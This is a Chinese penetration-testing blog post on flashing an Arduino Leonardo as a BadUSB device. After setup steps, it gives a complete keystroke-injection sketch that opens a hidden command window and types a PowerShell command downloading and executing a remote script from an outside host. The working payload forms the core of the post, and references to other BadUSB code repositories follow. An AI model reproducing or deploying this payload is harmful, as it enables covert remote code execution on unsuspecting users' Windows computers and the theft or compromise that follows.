连长 's Blog

安全、渗透、红蓝对抗。潜心研究、切勿浮躁。{写什么PHP/Python/Java? 转GO多好!}

USB烧录

工具类 0 评

0x1.安装与烧录

下载地址:https://www.arduino.cc/en/Main/Software
下面演示的是MAC版本:
插入USB让电脑读取到在工具里选择USB接口
-w831
选择程序的开发板有很多种开发板看你的板是什么
-w567

安装 Leonardo USB ATMEGA32U4 库模块
-w800

先看看程序有没有编译通过。
-w500
如果编译通过直接点击上传,也就是烧录。
-w500
OK

0x2.烧录WIN

#include<Keyboard.h>
void setup(){
Keyboard.begin();
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
delay(200);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(200);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK); 
Keyboard.println("cmd");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(200);
Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN); 
Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://usb.9x0.me/powershell.ps1') ");  
Keyboard.press(KEY_RETURN); 
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK); 
Keyboard.release(KEY_CAPS_LOCK); 
Keyboard.end();
}
void loop()
{
}

0x3.参考文献

参考文件能让你免走弯路。
https://www.cdxy.me/?p=549
https://github.com/Xyntax/BadUSB-code
https://www.jianshu.com/p/4265ce56e265
https://www.freebuf.com/sectool/150367.html
https://www.jianshu.com/p/97df17a22f0b
https://github.com/k8gege/k8badusb

CVE-2019-14287 LinuxSudo权限绕过提权复现
发表评论
撰写评论